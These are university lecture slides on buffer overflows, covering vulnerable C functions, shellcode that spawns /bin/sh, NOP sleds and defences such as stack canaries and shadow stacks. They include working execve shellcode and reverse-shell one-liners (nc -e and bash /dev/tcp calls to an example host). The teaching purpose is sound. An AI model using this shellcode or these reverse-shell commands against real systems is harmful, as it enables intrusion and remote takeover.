Software Security
(Part #1: Buffer Overflows)
SFL @ TU Dortmund
Software Security
• Software is written by humans, and thus contains bugs (= errors that cause incorrect outputs or unintended program behavior)
• Bugs may turn into vulnerabilities (= bugs that can be exploited by attackers to perform otherwise-unauthorized actions)
Bug example
int greet_user() {
    char username[8];
    printf("Please enter user name: ");
    if (fgets(username, 8, stdin) != NULL) {
        printf("Hi, username");  /* bug: prints the literal text "username" */
    }
    return 0;
}
Vulnerability example
int greet_user() {
    char username[8];
    int ch, i = 0;
    printf("Please enter user name: ");
    while ((ch = fgetc(stdin)) != EOF) {
        username[i++] = ch;  /* vulnerability: i is never checked against 8 */
    }
    printf("Hi, %s", username);
    return 0;
}
Bug: Program does not greet the user by their name, but prints the constant string “username” instead.
Vuln.: Program does not check bounds of username buffer, and may store user input out of bounds.
Software Security
• The following three lectures are on software security
• Main overarching questions to study:
• When and why is a program vulnerable, and how can it be exploited?
• How can CPUs, compilers or OSes protect against exploitation?
• Focus on C/C++ (et al.) programs for now
• Outlook to “safe” languages at the end of this lecture series
• Security of Web applications in dedicated lecture
Hint: The following slides will introduce dozens of small code examples. You can find all of them in a ZIP file in Moodle. Use this opportunity to deepen your knowledge by executing the programs yourself (e.g., in a debugger).
Data Types 101
• Arrays are consecutive elements of the same type
• Elements may be integers, pointers, structs, etc.
• Typically aligned in memory without separators
• One- or multidimensional
• Size of arrays is fixed
• Can be resized if full → dynamic array
• Often accompanied with a length variable that indicates current fill level
Arrays (Example)
int arrcomp() {
    uint32_t i, sum = 0;
    uint32_t int_arr[256];
    int_arr[64] = 0x11111111;
    for (i = 0; i < 256; i++) {
        int_arr[i] = i;
    }
    for (i = 0; i < 256; i++) {
        sum += int_arr[i];
    }
    return sum;
}
Assembly code
      mov ebp,esp
      sub esp,0x400                          ; 4*0x100 B on stack (array)
      ; 1st element at ebp-0x400, 65th at ebp-0x300
      mov DWORD PTR [ebp-0x300],0x11111111
      xor eax,eax                            ; variable i
rep:  mov DWORD PTR [ebp+eax*4-0x400],eax
      add eax,0x1                            ; i++
      cmp eax,0x100                          ; i < 256?
      jne rep
      lea edx,[ebp-0x400]                    ; edx = &int_arr[0]
      mov ecx,ebp                            ; points after end of int_arr
      xor eax,eax                            ; sum = 0 (rval)
rp2:  add eax,DWORD PTR [edx]                ; sum += int_arr[i]
      add edx,0x4                            ; go up (0->1, 1->2)
      cmp edx,ecx                            ; stop once past the last element
      jne rp2                                ; repeat otherwise
Strings (see ex30.asm)
• Strings in C: zero-terminated character array
• C strings are mutable
• Length determined by the terminating NUL character (0x00): strlen
• Example:
t e s t \n \0 a
• Plenty of other string types exist
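To make the zero-termination rule concrete, here is a minimal sketch that stores the seven bytes from the example above and asks strlen for the length. The helper name visible_length is made up for illustration. It shows that string functions only see the bytes before the first NUL, so the trailing 'a' is invisible to them.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: length of the C string stored in the example buffer. */
size_t visible_length(void) {
    /* 7 bytes in memory: 't','e','s','t','\n','\0','a' */
    const char buf[7] = { 't', 'e', 's', 't', '\n', '\0', 'a' };
    /* strlen counts bytes up to, but not including, the first NUL byte */
    return strlen(buf);
}
```

Calling visible_length() yields 5 (the four letters plus the newline), even though the buffer occupies 7 bytes.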
Buffer Overflows
Buffer Overflow: Data Corruption (1/2)
Buffer Overflow in fgetc() Call
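int do_auth() {
    register int i = 0;
    register int ch;  /* int, so that EOF can be told apart from data bytes */
    char username[8];
    int auth_successful = 0;
    printf("Please enter user name: ");
    while ((ch = fgetc(stdin)) != EOF) {
        username[i++] = ch;  /* no bounds check: may write past username[7] */
    }
    if (!strcmp(username, "aDm1N"))
        auth_successful = 1;
    return auth_successful;
}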
• Buffer overflow
• Out-of-bounds write may corrupt data (or function pointers)
• Variable-size data types in C do not enforce strict bounds checks
Figure: Overflow data corruption. Input “badguy32\x01” (9 chars); stack slots shown at rbp+0x08, rbp, rbp-0x08 and rbp-0x10, before and after the write. The first 8 bytes (“badguy32”) fill username[8]; the 9th byte (\x01) lands in the adjacent auth_successful.
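The data-only attack can be replayed safely on a model of the stack frame instead of the real stack. The sketch below is an illustration under assumptions: the struct frame_model, its layout (flag directly behind the 8-byte buffer) and the function name simulate_unchecked_copy are hypothetical and do not reflect actual compiler output. The copy ignores the size of username but never leaves the model, so the program itself has no undefined behavior.

```c
#include <stddef.h>
#include <string.h>

/* Simplified model of the frame: the flag sits directly behind the buffer.
   This layout is an assumption for illustration, not compiler output. */
struct frame_model {
    char username[8];
    unsigned char auth_successful;  /* models the low byte of the int flag */
};

/* Copies len input bytes starting at username without checking against
   sizeof(username). Writes are clamped to the model so nothing outside
   of it is touched. Returns the resulting flag value. */
int simulate_unchecked_copy(const char *input, size_t len) {
    unsigned char raw[sizeof(struct frame_model)] = {0};
    struct frame_model f;
    if (len > sizeof raw)
        len = sizeof raw;
    memcpy(raw, input, len);     /* the "overflowing" write */
    memcpy(&f, raw, sizeof f);   /* view the bytes as the frame again */
    return f.auth_successful;
}
```

With the 9-byte input "badguy32\x01" the function returns 1 although no password comparison ever succeeded; a short input such as "alice" leaves the flag at 0.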
Buffer Overflow: Data Corruption (2/2)
• As a defense, compilers can reorder local variables
• Order of variables on stack does not represent the one specified in code
• Store variable types prone to vuln. (e.g., strings, buffers) at higher addresses
• Store other variables (e.g., integers) at lower addresses
• Out-of-bounds writes then affect as few other variables as possible
• Back to example from last slide:
• Swapping the order of string buffer and flag variable would solve the data-only attack problem
Figure: reordered stack layout with username[8] at the higher address and auth_successful below it.
Buffer Overflow: Code Execution (1/2)
• Overwrite return address with pointer to shellcode
• Saved rip will blindly be interpreted as the address to return to upon ret
• Attacker can place arbitrary shellcode on stack and execute it (if the stack is executable)
Buffer Overflow in fread() Call
int mystr(char *fn) {
    char mystr[512];
    register FILE *f = fopen(fn, "rb");
    fread(mystr, 1024, 1, f);  /* reads 1024 bytes into a 512-byte buffer */
    return mystr[0];
}
Figure: stack layout with saved rip at rbp+0x8, saved rbp at rbp, and mystr[512] starting at rbp-0x200.
Buffer Overflow: Code Execution (2/2)
• Function return will transfer control to shellcode
• ret pops saved rip from stack, which is now attacker-controlled
• If attacker can approximate/guess buffer address, they can specify target
Figure: stack after the overflow. Saved rip holds &shellcode, saved rbp holds filler bytes (de ad de ad de ad de ad), and mystr[512] holds a NOP sled (90 90 …) followed by the shellcode bytes.
Assembly Code of Buffer Overflow Example
push rbp
mov rbp,rsp
sub rsp,0x200
mov esi,0x4006ac
call 400480                       ; fopen
mov rcx,rax
mov edx,0x1
mov esi,0x400
lea rdi,[rbp-0x200]
call 400450                       ; fread
movsx eax, BYTE PTR [rbp-0x200]
ret                               ; mystr’s ret: pop and jump to &shellcode
Shellcode
• Shellcode is attacker-controlled code that will be jumped to and will execute after a memory corruption attack
• Shellcode can be seen as the payload of an exploit
• For example: Code placed on an executable stack and returned to
• Shellcode can be almost arbitrary code chosen by the attacker
• Code that was never meant to execute in a program
• Assumption: Attacker can inject shellcode into memory of running process
Introductory Example to Shellcode Writing
• Our goal is to execute a shell
• This goal is also the origin of the name of shellcode: code running a shell
• We aim to use sys_execve(fname, argv, envp) system call
Shellcode to spawn /bin/sh
; sys_execve ( char *fname, char *argv[], char *envp[] )
; rax=59     ( rdi,         rsi,          rdx          )
; prepare fname argument
mov rbx, '/bin/sh'
; push string in rbx on stack (/bin/sh)
push rbx
; rsp points to last element on stack ====>
push rsp
; read pointer to string into rdi
pop rdi
; prepare other two args; basically, pass NULL pointers
mov rsi, 0
mov rdx, 0
; set system call number to execve’s (59) and execute it
mov al, 59 ; assume rest of rax was zero before this op
syscall
Figure: Stack layout after the two push instructions (rdi will point to the string after pop)
Shellcode Without Zero Bytes (1/5)
• C string functions assume zero byte (0x00) terminates a string
• Effectively, string functions stop when they encounter a zero byte
• Assume you pass an input string to a vulnerable strcpy(dst, src) call → strcpy() stops on the first zero byte encountered in src
• Solution: Design shellcode to be zero-byte free
• Guarantees that string functions do not terminate prematurely
Shellcode Without Zero Bytes (2/5)
• Revisiting our shell code example shows that it is not zero-byte free
• Two types of zero bytes are immediately visible
• The string “/bin/sh” is zero-terminated (2nd line)
• Moving zero (or other small numbers) into the registers includes zero bytes
Shellcode to spawn /bin/sh
400080: 48 bb 2f 62 69 6e 2f    movabs rbx,0x68732f6e69622f
400087: 73 68 00                (…)
40008a: 53                      push rbx
40008b: 54                      push rsp
40008c: 5f                      pop rdi
40008d: be 00 00 00 00          mov esi,0x0
400092: ba 00 00 00 00          mov edx,0x0
400097: b0 3b                   mov al,0x3b
400099: 0f 05                   syscall
Shellcode Without Zero Bytes (3/5)
• Zero-byte free number assignments
Assignment Including Zero Bytes
; zeroing a register
mov rax, 0
; store 1-byte integer
mov rax, 47
; store 3-byte integer
xor rax, rax
mov rax, 0x112233
Equivalent but Zero-Free Assignment
; zeroing a register
xor rax, rax
; store 1-byte integer
xor rax, rax
mov al, 47
; store 3-byte integer
xor rax, rax
mov ax, 0x1122
shl eax, 8
mov al, 0x33
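The zero-free sequence for the 3-byte integer is easy to get wrong, so it helps to replay it step by step. The following sketch models the registers with plain integers; the function name build_0x112233 is made up for illustration, and the model only covers the four instructions shown above (writes to al/ax keep the upper bits, writes to eax zero-extend).

```c
#include <stdint.h>

/* Models: xor rax, rax; mov ax, 0x1122; shl eax, 8; mov al, 0x33 */
uint64_t build_0x112233(void) {
    uint64_t rax = 0;                              /* xor rax, rax            */
    rax = (rax & ~UINT64_C(0xffff)) | 0x1122;      /* mov ax, 0x1122          */
    rax = (uint32_t)((uint32_t)rax << 8);          /* shl eax, 8 (zero-ext.)  */
    rax = (rax & ~UINT64_C(0xff)) | 0x33;          /* mov al, 0x33            */
    return rax;
}
```

The result equals 0x112233, the same value the single mov would have stored, but none of the four instructions needs a zero byte in its immediate.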
Shellcode Without Zero Bytes (4/5)
• Zero-byte free strings
With Zero Bytes
mov rax, '/bin/sh'
push rax
Zero-Free (16 bytes; two qwords on stack)
xor rax, rax
push rax
mov rax, '//bin/sh'
push rax
Zero-Free (24 bytes; one qword on stack)
mov rax, '/bin/shX'
xor rbx, rbx ; rbx = 0
dec rbx      ; = 0xffff..ff
shr rbx, 8   ; = 0x00ff..ff
and rax, rbx ; zero the MSB
; '/bin/sh\0'
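Both string tricks rely on how x86-64 stores a 64-bit immediate in little-endian order. The sketch below, with the hypothetical helpers pack_le and clear_top_byte, packs an 8-character string into the integer the assembler would emit and then replays the xor/dec/shr/and mask sequence on it. It is a model of the arithmetic only, not shellcode.

```c
#include <stdint.h>

/* Interprets 8 bytes as a little-endian 64-bit immediate, as x86-64 does:
   bytes[0] becomes the least significant byte. */
uint64_t pack_le(const char bytes[8]) {
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--)
        v = (v << 8) | (unsigned char)bytes[i];
    return v;
}

/* Models: xor rbx, rbx; dec rbx; shr rbx, 8; and rax, rbx */
uint64_t clear_top_byte(uint64_t rax) {
    uint64_t rbx = 0;   /* xor rbx, rbx                        */
    rbx -= 1;           /* dec rbx    -> 0xffffffffffffffff    */
    rbx >>= 8;          /* shr rbx, 8 -> 0x00ffffffffffffff    */
    return rax & rbx;   /* and rax, rbx: zero the MSB          */
}
```

clear_top_byte(pack_le("/bin/shX")) gives 0x68732f6e69622f, the same constant that appears in the movabs instruction of the original shellcode, while pack_le("//bin/sh") gives 0x68732f6e69622f2f, which contains no zero byte at all.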
Shellcode Without Zero Bytes (5/5)
• Everything put together yields zero-free shellcode
Zero-byte Free Shellcode to Spawn /bin/sh (27 bytes)
; prepare fname
xor rax, rax
push rax              ; zero qword terminates the string
mov rbx, '//bin/sh'
; push string in rbx on stack (//bin/sh)
push rbx
; rsp points to last element on stack
push rsp
; read pointer to string into rdi
pop rdi
; prepare other two args: pass NULL pointers
xor rsi, rsi
xor rdx, rdx
; set syscall number to execve (59) and execute
mov al, 59
syscall
Shellcode Minimization
• Shellcode might be limited in size
• For example, a buffer overflow may only allow storing a certain number of bytes
• Shellcode typically can be minimized by carefully selecting instructions
• Equivalent instructions (combinations) might exist
Code Not Optimized for Space
; zeroing rax (5B)
mov rax, 0
; zero rax, rdx, rbx (6B)
xor eax, eax
xor edx, edx
xor ebx, ebx
; store MAXINT in rax (7B)
mov rax, 0xffffffffffffffff
; copy rbx to rax (3B)
mov rax, rbx
Space-Optimized Code
; zeroing rax (2B)
xor eax, eax
; zero by multiply (4B)
xor ebx, ebx
mul ebx ; edx:eax = eax * 0
; MAXINT = 0 - 1 (5B)
xor eax, eax ; rax = 0
dec rax
; copy via stack (2B)
push rbx
pop rax
Reverse Shell
• A typical exploitation goal is to have a reverse shell
• Reverse shell connects back to attacker and gives attacker a shell over system
• There are basically two prominent ways to spawn reverse shell
• Option A: start a tool that gives you remote shell built-in
nc -e /bin/sh 10.0.0.1 1234
• Option B: Use a normal shell and redirect stdin/stdout to network
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
• Option B’: If bash features are lacking, redirect stdin/stdout using dup2()
s = socket();         // create a socket
dup2(s, 0);           // stdin from socket
dup2(s, 1);           // stdout to socket
connect(s, dst);      // connect to attacker
execve("/bin/sh");    // spawn shell
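The key step in Option B’ is that dup2() makes an existing file descriptor number refer to the socket. The sketch below demonstrates only that redirection and stays entirely local: it uses socketpair() in place of a network connection, and the function name redirect_stdout_demo is hypothetical. No shell is spawned.

```c
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

/* Redirects fd 1 (stdout) to one end of a local socket pair, writes msg,
   restores stdout, and reads the message back from the other end.
   Returns the number of bytes received, or -1 on error. */
ssize_t redirect_stdout_demo(const char *msg, char *out, size_t outlen) {
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0)
        return -1;
    ssize_t n = -1;
    int saved = dup(1);                        /* remember the real stdout */
    if (saved >= 0) {
        if (dup2(sv[0], 1) >= 0) {             /* fd 1 now is the socket   */
            ssize_t w = write(1, msg, strlen(msg));
            dup2(saved, 1);                    /* restore the real stdout  */
            if (w > 0)
                n = read(sv[1], out, outlen);  /* data arrived at the peer */
        }
        close(saved);
    }
    close(sv[0]);
    close(sv[1]);
    return n;
}
```

Anything written to fd 1 while the redirection is active ends up at the peer socket, which is exactly why a shell started after dup2(s, 0) and dup2(s, 1) talks to the remote side.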
Identifying Shellcode Location
• Stack layout of programs is oftentimes quite deterministic
→ Running a program multiple times results in equal stack addresses
• Typical approach to identify shellcode location (assumes local access)
• Enable crash dumps (e.g., ulimit -c unlimited in Linux)
• Overflow buffer and let program crash
• Analyze stack layout in crash dump
• Alternative: Attach debugger to vulnerable program and inspect addresses (warning: this might slightly change the stack layout)
• Sometimes attackers cannot predict exact location of shellcode
• Add nop sled at the beginning of code: several consecutive nop instructions
• No matter where entered, nop sled will lead to actual shellcode payload
• Attacker has higher chance to start at the correct position
NOP sled demo
; NOP sled
nop
nop
nop
nop
; … more NOPs
; Actual shellcode goes here
xor eax, eax
; …
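The byte layout of such an input can be sketched as a plain buffer-building routine. This is a layout model under assumptions, not a working exploit: the function name build_payload and all parameters are hypothetical, and it assumes the frame from the fread() example, i.e., the buffer ends directly below saved rbp, which is followed by saved rip.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Fills out[0..buf_len) with a NOP sled followed by the code bytes, then
   appends 8 filler bytes (covering saved rbp) and the 8-byte little-endian
   target address (covering saved rip).
   Returns the total length, or 0 if the code does not fit into the buffer
   or out is too small. */
size_t build_payload(uint8_t *out, size_t out_cap, size_t buf_len,
                     const uint8_t *code, size_t code_len, uint64_t target) {
    size_t total = buf_len + 16;
    if (code_len > buf_len || out_cap < total)
        return 0;
    size_t sled = buf_len - code_len;
    memset(out, 0x90, sled);                  /* nop is the single byte 0x90 */
    memcpy(out + sled, code, code_len);       /* code sits right after sled  */
    memset(out + buf_len, 0x41, 8);           /* filler over saved rbp       */
    for (int i = 0; i < 8; i++)               /* little-endian address       */
        out[buf_len + 8 + i] = (uint8_t)(target >> (8 * i));
    return total;
}
```

Because every byte of the sled is a valid one-byte instruction, any target address that falls inside the first buf_len - code_len bytes slides into the code that follows.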
Useful Tools for Software Exploitation & Shellcode Writing
• readelf: display ELF file header (sections, segments, symbols)
• nasm -f elf64 inp.asm -o bin
• Compile assembly; useful for shellcoders
• objdump -d -j ".text" -MIntel bin
• Disassemble code section of program using Intel syntax
• gdb / gdbtui
• Standard Linux console debugger with assembly support
Buffer Overflow Defenses
Stack Canaries (1/2)
• Idea: Place canary (i.e., a “secret” value) on stack before saved rbp/rip
• Overflow also has to overwrite the canary in order to overwrite saved rbp/rip
• Insert canary as a guard between (unsafe) stack variables and saved pointers
• Before executing ret, program checks integrity of canary
• Abort if canary has been manipulated
Figure: stack (rbp+8, rbp, and below) with the canary before and after the attack. After the overflow, saved rip holds &shellcode, while saved rbp, the canary slot and the buffer are filled with 0x90 bytes.
Before returning from function:
90 90 90 90 90 90 90 90 != CANARY → Abort execution
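The check can be replayed on a model of the frame. In this sketch the struct canary_frame, its field sizes and the function name call_with_canary are assumptions for illustration; real compilers emit the check in the function epilogue and abort the process instead of returning a status.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Model frame: buffer, then canary, then the saved return address. */
struct canary_frame {
    uint8_t  buf[16];
    uint64_t canary;
    uint64_t saved_rip;
};

/* Copies len input bytes into the frame without regard to sizeof(buf)
   (clamped to the model), then performs the canary check.
   Returns 1 if the function would return normally, 0 if it would abort. */
int call_with_canary(const uint8_t *input, size_t len, uint64_t secret) {
    struct canary_frame f;
    uint8_t raw[sizeof f];
    memset(&f, 0, sizeof f);
    f.canary = secret;                 /* prologue: place canary     */
    memcpy(raw, &f, sizeof f);
    if (len > sizeof raw)
        len = sizeof raw;
    memcpy(raw, input, len);           /* body: the unchecked write  */
    memcpy(&f, raw, sizeof f);
    return f.canary == secret;         /* epilogue: integrity check  */
}
```

An input that stays within the 16-byte buffer passes the check; any contiguous write that reaches saved_rip must cross the canary first and is detected unless it happens to reproduce the secret.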
Stack Canaries (2/2)
• Canary implementation details
• gcc/LLVM store canary in thread-local storage (pointed to by fs register)
Stack Canaries as Implemented by gcc
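mov rbp,rsp
mov rax,fs:0x28      ; load canary from thread-local storage
mov [rbp-0x8],rax    ; place canary below saved rbp
xor eax,eax          ; do not leave canary in register
; … function body
mov rdx,[rbp-0x8]    ; reload canary from stack
xor rdx,fs:0x28      ; result is zero iff canary is unchanged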
Random Canaries
• Random canaries use a random value pre-generated at program start
• Attacker has to guess (or read/leak) canary to exploit successfully
• One-time-randomization, i.e., canary is shared among functions/threads
• Why not per-function canaries?
• Slow down performance
– Need to generate random canary per function
– Can no longer use single memory location
• Do not give much stronger guarantees
– An attacker who can leak a canary can likely also leak several canaries
Terminator Canaries
• Terminator canaries consist of bytes that terminate C strings
• Attacker who aims to overwrite canary has to use these bytes
• Mitigates rip overwrites for several string functions
– line-based input functions such as gets(): stop at newline character
– scanf(“%s”): stops at white-space character
– strcpy(): stops at NUL byte
• Example: 32-bit terminator canary could be 0x00 || ‘\n’ || ‘\r’ || 0xFF
• Limited power
• No randomization, hence only stops string functions (and not, e.g., read())
• gcc falls back to terminator canaries if it cannot find source for randomness
• In practice, randomized and terminator canaries are combined
• gcc’s canaries consist of 6 random and 2 terminator bytes
• Attacker has to overwrite terminator bytes before reaching the random bytes
Limitations of Stack Canaries (1/2)
• Although widely used in practice, stack canaries have limitations
• Few security guarantees if random canary leaks (e.g., via a memory disclosure)
– Attacker can overwrite canary with leaked value
– To mitigate this, compilers usually combine random with terminator canaries
• No protection of local variables
– Only saved rbp/rip are protected, local variables can still be overwritten
– Requires careful reordering of local variables
• Only protects against stack-based buffer overflows
– Buffer overflows implicitly overwrite consecutive memory ranges
– Other attacks may overwrite the heap or just specific memory locations on the stack (→ format string vulnerabilities, heap overflows, etc.; see later)
Limitations of Stack Canaries (2/2)
• Less protection for auto-forking processes without re-randomization
• Canary can be leaked via blind hacking
• Assume a process forks for every new client connection (e.g., Web server)
• Attacker can operate on child process that shares canary with parent
• Crash of child is a side channel to indicate if the guessed canary was wrong
• Idea: Byte-by-byte trial-and-error on canary
• Requires max 256 attempts per byte, i.e., 1024x for 4B and 2048x for 8B canary
Original stack (canary = 7|8|2|3)
Brute-forcing the first canary byte (two crashes, success in 3rd attempt)
BF on 2nd canary byte (success in 2 attempts)
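The byte-by-byte search can be simulated without any real process. In the sketch below, child_survives stands in for the crash side channel of a forked child and brute_force_canary is a hypothetical driver; both names and the 8-byte canary length are assumptions for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define CANARY_LEN 8

/* Oracle modelling a forked child: it "survives" (returns 1) iff the first
   n overwritten bytes match the canary it inherited from the parent. */
static int child_survives(const uint8_t *secret, const uint8_t *guess, size_t n) {
    return memcmp(secret, guess, n) == 0;
}

/* Recovers the canary one byte at a time and stores it in out.
   Returns the number of oracle queries (i.e., connection attempts). */
unsigned brute_force_canary(const uint8_t secret[CANARY_LEN],
                            uint8_t out[CANARY_LEN]) {
    unsigned attempts = 0;
    for (size_t i = 0; i < CANARY_LEN; i++) {
        for (unsigned b = 0; b < 256; b++) {
            out[i] = (uint8_t)b;          /* overwrite only up to byte i */
            attempts++;
            if (child_survives(secret, out, i + 1))
                break;                    /* no crash: byte i is correct */
        }
    }
    return attempts;
}
```

Since each byte is confirmed independently, the number of attempts grows linearly with the canary length (at most 8 × 256 = 2048 here) instead of exponentially as it would for guessing all bytes at once.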
Return Address XORing
• XOR return address with random value in function prologue/epilogue
• An attacker can overwrite saved rip, but decryption will clobber its value
• In function prologue: encrypt saved rip
• In function epilogue: decrypt saved rip
• Similar security guarantees, but:
• Even secure if only saved rip is overwritten by attacker (in contrast, canaries assume a contiguous overwrite)
• Also susceptible to blind hacking, as value is not re-randomized
Implementation of Return Address XORing
; function prologue: encrypt saved rip
mov rbp, rsp
mov rcx, [xorsecret]
xor [rbp+8], rcx
xor rcx, rcx
; …
; function epilogue: decrypt saved rip
mov rcx, [xorsecret]
xor [rbp+8], rcx
xor rcx, rcx
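The property this defense relies on is that XOR with the same secret is its own inverse. A minimal sketch, with the hypothetical helper names protect and unprotect standing in for the prologue and epilogue instrumentation:

```c
#include <stdint.h>

/* Prologue: what gets stored in the saved-rip slot. */
uint64_t protect(uint64_t saved_rip, uint64_t secret) {
    return saved_rip ^ secret;
}

/* Epilogue: what ret will actually jump to. */
uint64_t unprotect(uint64_t stored, uint64_t secret) {
    return stored ^ secret;
}
```

A legitimate return address survives the round trip, because unprotect(protect(a, s), s) equals a. An address written directly into the slot by an attacker who does not know s is decoded to a different, unpredictable value whenever s is nonzero.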
Shadow Stack
• Idea of shadow stack: store return instruction pointer (rip) twice
• Function calls store rip on main stack, but attackers might overwrite stack
• Shadow stack: Instrument function calls to store rip in a second, secret location
• Before returning, check if rip on shadow stack matches rip on normal stack
• Two implementation alternatives
– Full shadow stack copies memory layout of normal stack: fast, but large memory footprint
– Dense shadow stack is consecutive array of return addresses: less memory, but slower
Dense Shadow Stack
sub [shad_sp], 8
mov rcx, [rbp+8]
mov [shad_sp], rcx
; …
Figure: layouts of the three stacks
Normal Stack: saved rip(n-1), saved rbp(n-1), local vars(n-1), saved rip(n)
Full Shadow Stack: saved rip(n-1) and saved rip(n) at the same offsets as on the normal stack
Dense Shadow Stack: saved rip(n-1), saved rip(n) stored back to back
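The dense variant boils down to a separate array of return addresses with a push on call and a compare on return. The sketch below models that bookkeeping in C; the names shadow_push and shadow_check_pop and the fixed depth are hypothetical, and a real implementation would be emitted by the compiler and keep the array in a protected location.

```c
#include <stddef.h>
#include <stdint.h>

#define SHADOW_DEPTH 64

static uint64_t shadow[SHADOW_DEPTH];   /* dense array of return addresses */
static size_t shadow_top = 0;

/* On function entry: remember the return address.
   Returns 0 on success, -1 if the shadow stack is full. */
int shadow_push(uint64_t ret_addr) {
    if (shadow_top == SHADOW_DEPTH)
        return -1;
    shadow[shadow_top++] = ret_addr;
    return 0;
}

/* Before ret: compare the address found on the normal stack with the
   shadow copy. Returns 1 on match, 0 on mismatch or empty shadow stack. */
int shadow_check_pop(uint64_t ret_addr_on_stack) {
    if (shadow_top == 0)
        return 0;
    return shadow[--shadow_top] == ret_addr_on_stack;
}
```

An overflow on the normal stack changes only the value passed to shadow_check_pop, not the shadow copy, so the mismatch is detected before the corrupted address is used.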